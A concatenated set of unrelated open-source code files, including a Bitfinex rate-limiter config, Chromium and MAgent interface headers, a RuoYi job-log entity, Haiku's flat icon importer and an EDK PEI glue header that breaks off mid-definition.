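    return 0;
}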
1,909
<filename>xchange-bitfinex/src/main/java/org/knowm/xchange/bitfinex/BitfinexResilience.java package org.knowm.xchange.bitfinex; import io.github.resilience4j.ratelimiter.RateLimiterConfig; import java.time.Duration; import org.knowm.xchange.client.ResilienceRegistries; public final class BitfinexResilience { public static final String BITFINEX_RATE_LIMITER = "bitfinexRateLimiter"; private BitfinexResilience() {} public static ResilienceRegistries createRegistries() { ResilienceRegistries registries = new ResilienceRegistries(); registries .rateLimiters() .rateLimiter( BITFINEX_RATE_LIMITER, RateLimiterConfig.from(registries.rateLimiters().getDefaultConfig()) .limitRefreshPeriod(Duration.ofMinutes(1)) .limitForPeriod(90) .build()); return registries; } }
354
2,151
// Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef REMOTING_PROTOCOL_SESSION_PLUGIN_H_ #define REMOTING_PROTOCOL_SESSION_PLUGIN_H_ #include <memory> #include "third_party/libjingle_xmpp/xmllite/xmlelement.h" namespace remoting { namespace protocol { // Interface for Session plugins. Plugins allow sending and receiving optional // information that is not essential for the session handshake. Messages generated // by the plugins on one end of a connection are attached to the session // handshake messages and passed to the plugins on the other end. Plugins are // optional, i.e. Session doesn't need any plugins to connect successfully. class SessionPlugin { public: SessionPlugin() = default; virtual ~SessionPlugin() = default; // Returns an XmlElement if the SessionPlugin needs to attach some data // to the outgoing message. virtual std::unique_ptr<buzz::XmlElement> GetNextMessage() = 0; // Handles messages in |attachments|. virtual void OnIncomingMessage(const buzz::XmlElement& attachments) = 0; }; } // namespace protocol } // namespace remoting #endif // REMOTING_PROTOCOL_SESSION_PLUGIN_H_
361
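A sketch of what a concrete SessionPlugin might look like (illustrative only, not taken from the Chromium tree). It assumes the usual buzz::XmlElement/buzz::QName constructors and XmlElement::SetBodyText()/Str() from xmllite, and an include path inferred from the header guard.

#include <memory>
#include <string>

#include "remoting/protocol/session_plugin.h"  // path assumed from the header guard

namespace remoting {
namespace protocol {

class ExamplePlugin : public SessionPlugin {
 public:
  // Attach one small stanza to the first outgoing handshake message only.
  std::unique_ptr<buzz::XmlElement> GetNextMessage() override {
    if (sent_)
      return nullptr;
    sent_ = true;
    auto message = std::make_unique<buzz::XmlElement>(
        buzz::QName("example:namespace", "example-plugin"));
    message->SetBodyText("hello from the other end");
    return message;
  }

  // Record whatever the peer's plugins attached to the incoming message.
  void OnIncomingMessage(const buzz::XmlElement& attachments) override {
    last_attachments_ = attachments.Str();
  }

 private:
  bool sent_ = false;
  std::string last_attachments_;
};

}  // namespace protocol
}  // namespace remoting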
1,532
#ifndef MAGNET_RENDER_BACKEND_SOCKET_H_ #define MAGNET_RENDER_BACKEND_SOCKET_H_ #include <string> #include <websocketpp/common/connection_hdl.hpp> #include "utility/utility.h" namespace magent { namespace render { template <class T> class ISocket : public render::Unique { protected: const T args; public: explicit ISocket(const T &args) : args(args) { } virtual void reply(const std::string &) = 0; virtual void receive(const std::string &) = 0; virtual void open() = 0; virtual void close() = 0; virtual void error() = 0; virtual void run() = 0; }; } // namespace render } // namespace magent #endif //MAGNET_RENDER_BACKEND_SOCKET_H_
260
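A sketch of a concrete ISocket<T> implementation (illustrative only, not part of MAgent). It assumes render::Unique adds no further pure-virtual requirements and that the header lives at the path implied by its include guard; a real subclass would drive a websocketpp endpoint instead of std::cout.

#include <iostream>
#include <string>

#include "render/backend/socket.h"  // path assumed from the include guard

namespace magent {
namespace render {

struct EchoConfig {
    std::string host;
    int port;
};

// Echoes every received payload straight back through reply().
class EchoSocket : public ISocket<EchoConfig> {
public:
    explicit EchoSocket(const EchoConfig &config) : ISocket<EchoConfig>(config) {}

    void reply(const std::string &message) override {
        std::cout << "reply: " << message << std::endl;
    }
    void receive(const std::string &message) override { reply(message); }
    void open() override { std::cout << "open " << args.host << ":" << args.port << std::endl; }
    void close() override { std::cout << "close" << std::endl; }
    void error() override { std::cerr << "socket error" << std::endl; }
    void run() override { /* event loop would block here */ }
};

} // namespace render
} // namespace magent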
441
/** * XQuery expressions. */ package org.basex.query.expr;
20
1,352
<reponame>gitofzhu/RuoYi package com.ruoyi.quartz.domain; import com.fasterxml.jackson.annotation.JsonFormat; import com.ruoyi.common.annotation.Excel; import com.ruoyi.common.base.BaseEntity; import io.swagger.annotations.ApiModel; import io.swagger.annotations.ApiModelProperty; import lombok.Data; import lombok.EqualsAndHashCode; import java.util.Date; /** * 定时任务调度日志表 sys_job_log * * @author ruoyi */ @EqualsAndHashCode(callSuper = true) @Data @ApiModel(description="定时任务调度日志",parent=BaseEntity.class) public class SysJobLog extends BaseEntity { private static final long serialVersionUID = 1L; @Excel(name = "日志序号") @ApiModelProperty(value="日志序号",name="jobLogId",example="1") private Long jobLogId; @Excel(name = "任务名称") @ApiModelProperty(value="任务名称",name="jobName",example="ryTask") private String jobName; @Excel(name = "任务组名") @ApiModelProperty(value="任务组名",name="jobGroup",example="系统默认(无参)") private String jobGroup; @Excel(name = "任务方法") @ApiModelProperty(value="任务方法",name="methodName",example="ryNoParams") private String methodName; @Excel(name = "方法参数") @ApiModelProperty(value="方法参数",name="methodParams") private String methodParams; @Excel(name = "日志信息") @ApiModelProperty(value="日志信息",name="jobMessage",example="ryTask 总共耗时:2毫秒") private String jobMessage; @Excel(name = "执行状态" , readConverterExp = "0=正常,1=失败") @ApiModelProperty(value="执行状态",name="status",example="0",allowableValues = "0,1",reference="0=正常,1=失败") private String status; @Excel(name = "异常信息") @ApiModelProperty(value="异常信息",name="exceptionInfo") private String exceptionInfo; @JsonFormat(pattern = "yyyy-MM-dd HH:mm:ss") @ApiModelProperty(value="开始时间",name="startTime",example="2018-12-15 18:03:58",dataType="java.util.Date") private Date startTime; @JsonFormat(pattern = "yyyy-MM-dd HH:mm:ss") @ApiModelProperty(value="结束时间",name="endTime",example="2018-12-15 18:03:58",dataType="java.util.Date") private Date endTime; }
984
1,338
<reponame>Kirishikesan/haiku /* * Copyright 2006, Haiku. All rights reserved. * Distributed under the terms of the MIT License. * * Authors: * <NAME> <<EMAIL>> */ #include "FlatIconImporter.h" #include <new> #include <stdio.h> #include <Archivable.h> #include <DataIO.h> #include <Message.h> #include "AffineTransformer.h" #include "AutoDeleter.h" #include "ContourTransformer.h" #include "FlatIconFormat.h" #include "GradientTransformable.h" #include "Icon.h" #include "LittleEndianBuffer.h" #include "PathCommandQueue.h" #include "PathContainer.h" #include "PerspectiveTransformer.h" #include "Shape.h" #include "StrokeTransformer.h" #include "Style.h" #include "StyleContainer.h" #include "VectorPath.h" using std::nothrow; // constructor FlatIconImporter::FlatIconImporter() #ifdef ICON_O_MATIC : Importer() #endif { } // destructor FlatIconImporter::~FlatIconImporter() { } // Import status_t FlatIconImporter::Import(Icon* icon, BPositionIO* stream) { #ifdef ICON_O_MATIC status_t ret = Init(icon); if (ret < B_OK) return ret; #else status_t ret; #endif // seek around in the stream to figure out the size off_t size = stream->Seek(0, SEEK_END); if (stream->Seek(0, SEEK_SET) != 0) return B_ERROR; // we chicken out on anything larger than 256k if (size <= 0 || size > 256 * 1024) return B_BAD_VALUE; // read the entire stream into a buffer LittleEndianBuffer buffer(size); if (!buffer.Buffer()) return B_NO_MEMORY; if (stream->Read(buffer.Buffer(), size) != size) return B_ERROR; ret = _ParseSections(buffer, icon); return ret; } // Import status_t FlatIconImporter::Import(Icon* icon, uint8* _buffer, size_t size) { #ifdef ICON_O_MATIC status_t ret = Init(icon); if (ret < B_OK) return ret; #endif if (!_buffer) return B_BAD_VALUE; // attach LittleEndianBuffer to buffer LittleEndianBuffer buffer(_buffer, size); return _ParseSections(buffer, icon); } // #pragma mark - // _ParseSections status_t FlatIconImporter::_ParseSections(LittleEndianBuffer& buffer, Icon* icon) { // test if this is an icon at all uint32 magic; if (!buffer.Read(magic) || magic != FLAT_ICON_MAGIC) return B_BAD_TYPE; // styles StyleContainer* styles = icon->Styles(); status_t ret = _ParseStyles(buffer, styles); if (ret < B_OK) { printf("FlatIconImporter::_ParseSections() - " "error parsing styles: %s\n", strerror(ret)); return ret; } // paths PathContainer* paths = icon->Paths(); ret = _ParsePaths(buffer, paths); if (ret < B_OK) { printf("FlatIconImporter::_ParseSections() - " "error parsing paths: %s\n", strerror(ret)); return ret; } // shapes ret = _ParseShapes(buffer, styles, paths, icon->Shapes()); if (ret < B_OK) { printf("FlatIconImporter::_ParseSections() - " "error parsing shapes: %s\n", strerror(ret)); return ret; } return B_OK; } // _ReadTransformable static bool _ReadTransformable(LittleEndianBuffer& buffer, Transformable* transformable) { int32 matrixSize = Transformable::matrix_size; double matrix[matrixSize]; for (int32 i = 0; i < matrixSize; i++) { float value; if (!read_float_24(buffer, value)) return false; matrix[i] = value; } transformable->LoadFrom(matrix); return true; } // _ReadTranslation static bool _ReadTranslation(LittleEndianBuffer& buffer, Transformable* transformable) { BPoint t; if (read_coord(buffer, t.x) && read_coord(buffer, t.y)) { transformable->TranslateBy(t); return true; } return false; } // _ReadColorStyle static Style* _ReadColorStyle(LittleEndianBuffer& buffer, bool alpha, bool gray) { rgb_color color; if (alpha) { if (gray) { if (!buffer.Read(color.red) || !buffer.Read(color.alpha)) return NULL; 
color.green = color.blue = color.red; } else { if (!buffer.Read((uint32&)color)) return NULL; } } else { color.alpha = 255; if (gray) { if (!buffer.Read(color.red)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read(color.red) || !buffer.Read(color.green) || !buffer.Read(color.blue)) return NULL; } } return new (nothrow) Style(color); } // _ReadGradientStyle static Style* _ReadGradientStyle(LittleEndianBuffer& buffer) { Style* style = new (nothrow) Style(); if (!style) return NULL; ObjectDeleter<Style> styleDeleter(style); uint8 gradientType; uint8 gradientFlags; uint8 gradientStopCount; if (!buffer.Read(gradientType) || !buffer.Read(gradientFlags) || !buffer.Read(gradientStopCount)) { return NULL; } Gradient gradient(true); // empty gradient gradient.SetType((gradients_type)gradientType); // TODO: support more stuff with flags // ("inherits transformation" and so on) if (gradientFlags & GRADIENT_FLAG_TRANSFORM) { if (!_ReadTransformable(buffer, &gradient)) return NULL; } bool alpha = !(gradientFlags & GRADIENT_FLAG_NO_ALPHA); bool gray = gradientFlags & GRADIENT_FLAG_GRAYS; for (int32 i = 0; i < gradientStopCount; i++) { uint8 stopOffset; rgb_color color; if (!buffer.Read(stopOffset)) return NULL; if (alpha) { if (gray) { if (!buffer.Read(color.red) || !buffer.Read(color.alpha)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read((uint32&)color)) return NULL; } } else { color.alpha = 255; if (gray) { if (!buffer.Read(color.red)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read(color.red) || !buffer.Read(color.green) || !buffer.Read(color.blue)) { return NULL; } } } gradient.AddColor(color, stopOffset / 255.0); } style->SetGradient(&gradient); styleDeleter.Detach(); return style; } // _ParseStyles status_t FlatIconImporter::_ParseStyles(LittleEndianBuffer& buffer, StyleContainer* styles) { uint8 styleCount; if (!buffer.Read(styleCount)) return B_ERROR; for (int32 i = 0; i < styleCount; i++) { uint8 styleType; if (!buffer.Read(styleType)) return B_ERROR; Style* style = NULL; if (styleType == STYLE_TYPE_SOLID_COLOR) { // solid color style = _ReadColorStyle(buffer, true, false); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_SOLID_COLOR_NO_ALPHA) { // solid color without alpha style = _ReadColorStyle(buffer, false, false); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_SOLID_GRAY) { // solid gray plus alpha style = _ReadColorStyle(buffer, true, true); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_SOLID_GRAY_NO_ALPHA) { // solid gray without alpha style = _ReadColorStyle(buffer, false, true); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_GRADIENT) { // gradient style = _ReadGradientStyle(buffer); if (!style) return B_NO_MEMORY; } else { // unkown style type, skip tag uint16 tagLength; if (!buffer.Read(tagLength)) return B_ERROR; buffer.Skip(tagLength); continue; } // add style if we were able to read one if (style && !styles->AddStyle(style)) { delete style; return B_NO_MEMORY; } } return B_OK; } // read_path_no_curves static bool read_path_no_curves(LittleEndianBuffer& buffer, VectorPath* path, uint8 pointCount) { for (uint32 p = 0; p < pointCount; p++) { BPoint point; if (!read_coord(buffer, point.x) || !read_coord(buffer, point.y)) return false; if (!path->AddPoint(point)) return false; } return true; } // read_path_curves static bool read_path_curves(LittleEndianBuffer& buffer, VectorPath* path, uint8 pointCount) { for (uint32 p = 
0; p < pointCount; p++) { BPoint point; if (!read_coord(buffer, point.x) || !read_coord(buffer, point.y)) return false; BPoint pointIn; if (!read_coord(buffer, pointIn.x) || !read_coord(buffer, pointIn.y)) return false; BPoint pointOut; if (!read_coord(buffer, pointOut.x) || !read_coord(buffer, pointOut.y)) return false; if (!path->AddPoint(point, pointIn, pointOut, false)) return false; } return true; } // read_path_with_commands static bool read_path_with_commands(LittleEndianBuffer& buffer, VectorPath* path, uint8 pointCount) { PathCommandQueue queue; return queue.Read(buffer, path, pointCount); } // _ParsePaths status_t FlatIconImporter::_ParsePaths(LittleEndianBuffer& buffer, PathContainer* paths) { uint8 pathCount; if (!buffer.Read(pathCount)) return B_ERROR; for (int32 i = 0; i < pathCount; i++) { uint8 pathFlags; uint8 pointCount; if (!buffer.Read(pathFlags) || !buffer.Read(pointCount)) return B_ERROR; VectorPath* path = new (nothrow) VectorPath(); if (!path) return B_NO_MEMORY; // chose path reading strategy depending on path flags bool error = false; if (pathFlags & PATH_FLAG_NO_CURVES) { if (!read_path_no_curves(buffer, path, pointCount)) error = true; } else if (pathFlags & PATH_FLAG_USES_COMMANDS) { if (!read_path_with_commands(buffer, path, pointCount)) error = true; } else { if (!read_path_curves(buffer, path, pointCount)) error = true; } if (error) { delete path; return B_ERROR; } // post process path to clean it up path->CleanUp(); if (pathFlags & PATH_FLAG_CLOSED) path->SetClosed(true); // add path to container if (!paths->AddPath(path)) { delete path; return B_NO_MEMORY; } } return B_OK; } // _ReadTransformer static Transformer* _ReadTransformer(LittleEndianBuffer& buffer, VertexSource& source) { uint8 transformerType; if (!buffer.Read(transformerType)) return NULL; switch (transformerType) { case TRANSFORMER_TYPE_AFFINE: { AffineTransformer* affine = new (nothrow) AffineTransformer(source); if (!affine) return NULL; double matrix[6]; for (int32 i = 0; i < 6; i++) { float value; if (!buffer.Read(value)) { delete affine; return NULL; } matrix[i] = value; } affine->load_from(matrix); return affine; } case TRANSFORMER_TYPE_CONTOUR: { ContourTransformer* contour = new (nothrow) ContourTransformer(source); uint8 width; uint8 lineJoin; uint8 miterLimit; if (!contour || !buffer.Read(width) || !buffer.Read(lineJoin) || !buffer.Read(miterLimit)) { delete contour; return NULL; } contour->width(width - 128.0); contour->line_join((agg::line_join_e)lineJoin); contour->miter_limit(miterLimit); return contour; } case TRANSFORMER_TYPE_PERSPECTIVE: { PerspectiveTransformer* perspective = new (nothrow) PerspectiveTransformer(source); // TODO: upgrade AGG to be able to support storage of // trans_perspective return perspective; } case TRANSFORMER_TYPE_STROKE: { StrokeTransformer* stroke = new (nothrow) StrokeTransformer(source); uint8 width; uint8 lineOptions; uint8 miterLimit; // uint8 shorten; if (!stroke || !buffer.Read(width) || !buffer.Read(lineOptions) || !buffer.Read(miterLimit)) { delete stroke; return NULL; } stroke->width(width - 128.0); uint8 lineJoin = lineOptions & 15; stroke->line_join((agg::line_join_e)lineJoin); uint8 lineCap = lineOptions >> 4; stroke->line_cap((agg::line_cap_e)lineCap); stroke->miter_limit(miterLimit); return stroke; } default: { // unkown transformer, skip tag uint16 tagLength; if (!buffer.Read(tagLength)) return NULL; buffer.Skip(tagLength); return NULL; } } } // _ReadPathSourceShape Shape* FlatIconImporter::_ReadPathSourceShape(LittleEndianBuffer& 
buffer, StyleContainer* styles, PathContainer* paths) { // find out which style this shape uses uint8 styleIndex; uint8 pathCount; if (!buffer.Read(styleIndex) || !buffer.Read(pathCount)) return NULL; #ifdef ICON_O_MATIC Style* style = styles->StyleAt(StyleIndexFor(styleIndex)); #else Style* style = styles->StyleAt(styleIndex); #endif if (!style) { printf("_ReadPathSourceShape() - " "shape references non-existing style %d\n", styleIndex); return NULL; } // create the shape Shape* shape = new (nothrow) Shape(style); ObjectDeleter<Shape> shapeDeleter(shape); if (!shape || shape->InitCheck() < B_OK) return NULL; // find out which paths this shape uses for (uint32 i = 0; i < pathCount; i++) { uint8 pathIndex; if (!buffer.Read(pathIndex)) return NULL; #ifdef ICON_O_MATIC VectorPath* path = paths->PathAt(PathIndexFor(pathIndex)); #else VectorPath* path = paths->PathAt(pathIndex); #endif if (!path) { printf("_ReadPathSourceShape() - " "shape references non-existing path %d\n", pathIndex); continue; } shape->Paths()->AddPath(path); } // shape flags uint8 shapeFlags; if (!buffer.Read(shapeFlags)) return NULL; shape->SetHinting(shapeFlags & SHAPE_FLAG_HINTING); if (shapeFlags & SHAPE_FLAG_TRANSFORM) { // transformation if (!_ReadTransformable(buffer, shape)) return NULL; } else if (shapeFlags & SHAPE_FLAG_TRANSLATION) { // translation if (!_ReadTranslation(buffer, shape)) return NULL; } if (shapeFlags & SHAPE_FLAG_LOD_SCALE) { // min max visibility scale uint8 minScale; uint8 maxScale; if (!buffer.Read(minScale) || !buffer.Read(maxScale)) return NULL; shape->SetMinVisibilityScale(minScale / 63.75); shape->SetMaxVisibilityScale(maxScale / 63.75); } // transformers if (shapeFlags & SHAPE_FLAG_HAS_TRANSFORMERS) { uint8 transformerCount; if (!buffer.Read(transformerCount)) return NULL; for (uint32 i = 0; i < transformerCount; i++) { Transformer* transformer = _ReadTransformer(buffer, shape->VertexSource()); if (transformer && !shape->AddTransformer(transformer)) { delete transformer; return NULL; } } } shapeDeleter.Detach(); return shape; } // _ParseShapes status_t FlatIconImporter::_ParseShapes(LittleEndianBuffer& buffer, StyleContainer* styles, PathContainer* paths, ShapeContainer* shapes) { uint8 shapeCount; if (!buffer.Read(shapeCount)) return B_ERROR; for (uint32 i = 0; i < shapeCount; i++) { uint8 shapeType; if (!buffer.Read(shapeType)) return B_ERROR; Shape* shape = NULL; if (shapeType == SHAPE_TYPE_PATH_SOURCE) { // path source shape shape = _ReadPathSourceShape(buffer, styles, paths); if (!shape) return B_NO_MEMORY; } else { // unkown shape type, skip tag uint16 tagLength; if (!buffer.Read(tagLength)) return B_ERROR; buffer.Skip(tagLength); continue; } // add shape if we were able to read one if (shape && !shapes->AddShape(shape)) { delete shape; return B_NO_MEMORY; } } return B_OK; }
5,919
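A usage sketch for the importer above (illustrative only, not from the Haiku sources). It assumes Icon has a default constructor and that the buffer holds flat-icon (HVIF) data.

#include <new>

#include "FlatIconImporter.h"
#include "Icon.h"

// Parse an in-memory flat-icon buffer into a freshly allocated Icon.
static status_t
LoadIconFromBuffer(uint8* data, size_t size, Icon** _icon)
{
    Icon* icon = new (std::nothrow) Icon();
    if (icon == NULL)
        return B_NO_MEMORY;

    FlatIconImporter importer;
    // Import() checks the FLAT_ICON_MAGIC header, then reads the style,
    // path and shape sections in that order.
    status_t ret = importer.Import(icon, data, size);
    if (ret != B_OK) {
        delete icon;
        return ret;
    }

    *_icon = icon;
    return B_OK;
}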
2,757
/*++ Copyright (c) 2004 - 2007, Intel Corporation. All rights reserved.<BR> This program and the accompanying materials are licensed and made available under the terms and conditions of the BSD License which accompanies this distribution. The full text of the license may be found at http://opensource.org/licenses/bsd-license.php THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. Module Name: EdkIIGlueDefinitionChangesPeim.h Abstract: Data structure definition changes from EDK to EDKII --*/ #ifndef __EDKII_GLUE_DEFINITION_CHANGES_PEIM_H__ #define __EDKII_GLUE_DEFINITION_CHANGES_PEIM_H__ #if (EFI_SPECIFICATION_VERSION >= 0x0002000A) #include "TianoHii.h" #else #include "EfiInternalFormRepresentation.h" #endif #include "EdkIIGlueDefinitionChangesBase.h" #include "EfiPciCfg.h" // // typedef Edk types - EdkII types // typedef EFI_MEMORY_ARRAY_START_ADDRESS EFI_MEMORY_ARRAY_START_ADDRESS_DATA; typedef EFI_MEMORY_DEVICE_START_ADDRESS EFI_MEMORY_DEVICE_START_ADDRESS_DATA; typedef EFI_MISC_LAST_PCI_BUS EFI_MISC_LAST_PCI_BUS_DATA; typedef EFI_MISC_BIOS_VENDOR EFI_MISC_BIOS_VENDOR_DATA; typedef EFI_MISC_SYSTEM_MANUFACTURER EFI_MISC_SYSTEM_MANUFACTURER_DATA; typedef EFI_MISC_BASE_BOARD_MANUFACTURER EFI_MISC_BASE_BOARD_MANUFACTURER_DATA; typedef EFI_MISC_CHASSIS_MANUFACTURER EFI_MISC_CHASSIS_MANUFACTURER_DATA; typedef EFI_MISC_PORT_INTERNAL_CONNECTOR_DESIGNATOR EFI_MISC_PORT_INTERNAL_CONNECTOR_DESIGNATOR_DATA; typedef EFI_MISC_SYSTEM_SLOT_DESIGNATION EFI_MISC_SYSTEM_SLOT_DESIGNATION_DATA; typedef EFI_MISC_ONBOARD_DEVICE EFI_MISC_ONBOARD_DEVICE_DATA; typedef EFI_MISC_ONBOARD_DEVICE_TYPE_DATA EFI_MISC_PORTING_DEVICE_TYPE_DATA; typedef EFI_MISC_OEM_STRING EFI_MISC_OEM_STRING_DATA; typedef EFI_MISC_SYSTEM_OPTION_STRING EFI_MISC_SYSTEM_OPTION_STRING_DATA; typedef EFI_MISC_NUMBER_OF_INSTALLABLE_LANGUAGES EFI_MISC_NUMBER_OF_INSTALLABLE_LANGUAGES_DATA; typedef EFI_MISC_SYSTEM_LANGUAGE_STRING EFI_MISC_SYSTEM_LANGUAGE_STRING_DATA; typedef EFI_MISC_BIS_ENTRY_POINT EFI_MISC_BIS_ENTRY_POINT_DATA; typedef EFI_MISC_BOOT_INFORMATION_STATUS EFI_MISC_BOOT_INFORMATION_STATUS_DATA; typedef EFI_MISC_SYSTEM_POWER_SUPPLY EFI_MISC_SYSTEM_POWER_SUPPLY_DATA ; typedef EFI_MISC_SMBIOS_STRUCT_ENCAPSULATION EFI_MISC_SMBIOS_STRUCT_ENCAPSULATION_DATA; // ------------------- // EdkII Names - Edk Names // ------------------- #define gEfiPeiCpuIoPpiInServiceTableGuid gPeiCpuIoPpiInServiceTableGuid #define gEfiEndOfPeiSignalPpiGuid gEndOfPeiSignalPpiGuid #define gEfiPeiFvFileLoaderPpiGuid gPeiFvFileLoaderPpiGuid #define gEfiPeiMasterBootModePpiGuid gPeiMasterBootModePpiGuid #define gEfiPeiMemoryDiscoveredPpiGuid gPeiMemoryDiscoveredPpiGuid #define gEfiPciCfgPpiInServiceTableGuid gPeiPciCfgPpiInServiceTableGuid #define gEfiPeiReadOnlyVariablePpiGuid gPeiReadOnlyVariablePpiGuid #define gEfiPeiRecoveryModulePpiGuid gPeiRecoveryModulePpiGuid #define gEfiPeiResetPpiGuid gPeiResetPpiGuid #define gEfiPeiS3ResumePpiGuid gPeiS3ResumePpiGuid #define gEfiPeiSectionExtractionPpiGuid gPeiSectionExtractionPpiGuid #define gEfiPeiSecurityPpiGuid gPeiSecurityPpiGuid #define gEfiPeiStatusCodePpiGuid gPeiStatusCodePpiGuid #define gEfiPeiBootScriptExecuterPpiGuid gPeiBootScriptExecuterPpiGuid #define gEfiPeiSmbusPpiGuid gPeiSmbusPpiGuid #define gEfiPeiBlockIoPpiGuid gPeiBlockIoPpiGuid #define gEfiPeiDeviceRecoveryModulePpiGuid gPeiDeviceRecoveryModulePpiGuid #define gEfiPeiStallPpiGuid gPeiStallPpiGuid #define gEfiPeiPciCfgPpiInServiceTableGuid 
gPeiPciCfgPpiInServiceTableGuid #define gEfiPeiAtaControllerPpiGuid gPeiAtaControllerPpiGuid #define EFI_PEI_CPU_IO_PPI_INSTALLED_GUID PEI_CPU_IO_PPI_GUID #define EFI_PEI_RESET_PPI_GUID PEI_RESET_PPI_GUID #define EFI_PEI_PCI_CFG_PPI_INSTALLED_GUID PEI_PCI_CFG_PPI_GUID #define EFI_PEI_REPORT_PROGRESS_CODE_PPI_GUID PEI_STATUS_CODE_PPI_GUID #define EFI_PEI_BOOT_IN_RECOVERY_MODE_PEIM_PPI PEI_BOOT_IN_RECOVERY_MODE_PEIM_PPI #define EFI_PEI_END_OF_PEI_PHASE_PPI_GUID PEI_END_OF_PEI_PHASE_PPI_GUID #define EFI_PEI_MASTER_BOOT_MODE_PEIM_PPI PEI_MASTER_BOOT_MODE_PEIM_PPI #define EFI_PEI_PERMANENT_MEMORY_INSTALLED_PPI_GUID PEI_PERMANENT_MEMORY_INSTALLED_PPI_GUID #define EFI_PEI_READ_ONLY_VARIABLE_ACCESS_PPI_GUID PEI_READ_ONLY_VARIABLE_ACCESS_PPI_GUID #define EFI_PEI_RECOVERY_MODULE_PPI_GUID PEI_RECOVERY_MODULE_INTERFACE_PPI #define EFI_PEI_S3_RESUME_PPI_GUID PEI_S3_RESUME_PPI_GUID #define EFI_PEI_SECURITY_PPI_GUID PEI_SECURITY_PPI_GUID #define EFI_PEI_STALL_PPI_GUID PEI_STALL_PPI_GUID #define EFI_PEI_SMBUS_PPI_GUID PEI_SMBUS_PPI_GUID #define EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI_GUID PEI_BOOT_SCRIPT_EXECUTER_PPI_GUID #define EFI_PEI_FIND_FV_PPI_GUID EFI_FIND_FV_PPI_GUID #define EFI_PEI_VIRTUAL_BLOCK_IO_PPI PEI_BLOCK_IO_PPI_GUID #define EFI_PEI_DEVICE_RECOVERY_MODULE_PPI_GUID PEI_DEVICE_RECOVERY_MODULE_INTERFACE_PPI // // typedef Edk types - EdkII types // typedef PEI_RECOVERY_MODULE_INTERFACE EFI_PEI_RECOVERY_MODULE_PPI; typedef PEI_STALL_PPI EFI_PEI_STALL_PPI; typedef PEI_SMBUS_PPI EFI_PEI_SMBUS_PPI; typedef PEI_READ_ONLY_VARIABLE_PPI EFI_PEI_READ_ONLY_VARIABLE_PPI; typedef PEI_PCI_CFG_PPI EFI_PEI_PCI_CFG_PPI; typedef PEI_STATUS_CODE_PPI EFI_PEI_PROGRESS_CODE_PPI; typedef PEI_CPU_IO_PPI_WIDTH EFI_PEI_CPU_IO_PPI_WIDTH; typedef PEI_CPU_IO_PPI_IO_MEM EFI_PEI_CPU_IO_PPI_IO_MEM; typedef PEI_CPU_IO_PPI_ACCESS EFI_PEI_CPU_IO_PPI_ACCESS; typedef PEI_CPU_IO_PPI_IO_READ8 EFI_PEI_CPU_IO_PPI_IO_READ8; typedef PEI_CPU_IO_PPI_IO_READ16 EFI_PEI_CPU_IO_PPI_IO_READ16; typedef PEI_CPU_IO_PPI_IO_READ32 EFI_PEI_CPU_IO_PPI_IO_READ32; typedef PEI_CPU_IO_PPI_IO_READ64 EFI_PEI_CPU_IO_PPI_IO_READ64; typedef PEI_CPU_IO_PPI_IO_WRITE8 EFI_PEI_CPU_IO_PPI_IO_WRITE8; typedef PEI_CPU_IO_PPI_IO_WRITE16 EFI_PEI_CPU_IO_PPI_IO_WRITE16; typedef PEI_CPU_IO_PPI_IO_WRITE32 EFI_PEI_CPU_IO_PPI_IO_WRITE32; typedef PEI_CPU_IO_PPI_IO_WRITE64 EFI_PEI_CPU_IO_PPI_IO_WRITE64; typedef PEI_CPU_IO_PPI_MEM_READ8 EFI_PEI_CPU_IO_PPI_MEM_READ8; typedef PEI_CPU_IO_PPI_MEM_READ16 EFI_PEI_CPU_IO_PPI_MEM_READ16; typedef PEI_CPU_IO_PPI_MEM_READ32 EFI_PEI_CPU_IO_PPI_MEM_READ32; typedef PEI_CPU_IO_PPI_MEM_READ64 EFI_PEI_CPU_IO_PPI_MEM_READ64; typedef PEI_CPU_IO_PPI_MEM_WRITE8 EFI_PEI_CPU_IO_PPI_MEM_WRITE8; typedef PEI_CPU_IO_PPI_MEM_WRITE16 EFI_PEI_CPU_IO_PPI_MEM_WRITE16; typedef PEI_CPU_IO_PPI_MEM_WRITE32 EFI_PEI_CPU_IO_PPI_MEM_WRITE32; typedef PEI_CPU_IO_PPI_MEM_WRITE64 EFI_PEI_CPU_IO_PPI_MEM_WRITE64; typedef PEI_GET_VARIABLE EFI_PEI_GET_VARIABLE; typedef PEI_GET_NEXT_VARIABLE_NAME EFI_PEI_GET_NEXT_VARIABLE_NAME; typedef PEI_LOAD_RECOVERY_CAPSULE EFI_PEI_LOAD_RECOVERY_CAPSULE; typedef PEI_RESET_PPI EFI_PEI_RESET_PPI; typedef PEI_S3_RESUME_PPI EFI_PEI_S3_RESUME_PPI; typedef PEI_S3_RESUME_PPI_RESTORE_CONFIG EFI_PEI_S3_RESUME_PPI_RESTORE_CONFIG; typedef SEC_PLATFORM_INFORMATION EFI_SEC_PLATFORM_INFORMATION; typedef PEI_SECURITY_PPI EFI_PEI_SECURITY_PPI; typedef PEI_SECURITY_AUTHENTICATION_STATE EFI_PEI_SECURITY_AUTHENTICATION_STATE; typedef PEI_STALL EFI_PEI_STALL; typedef PEI_SMBUS_PPI_EXECUTE_OPERATION EFI_PEI_SMBUS_PPI_EXECUTE_OPERATION; typedef 
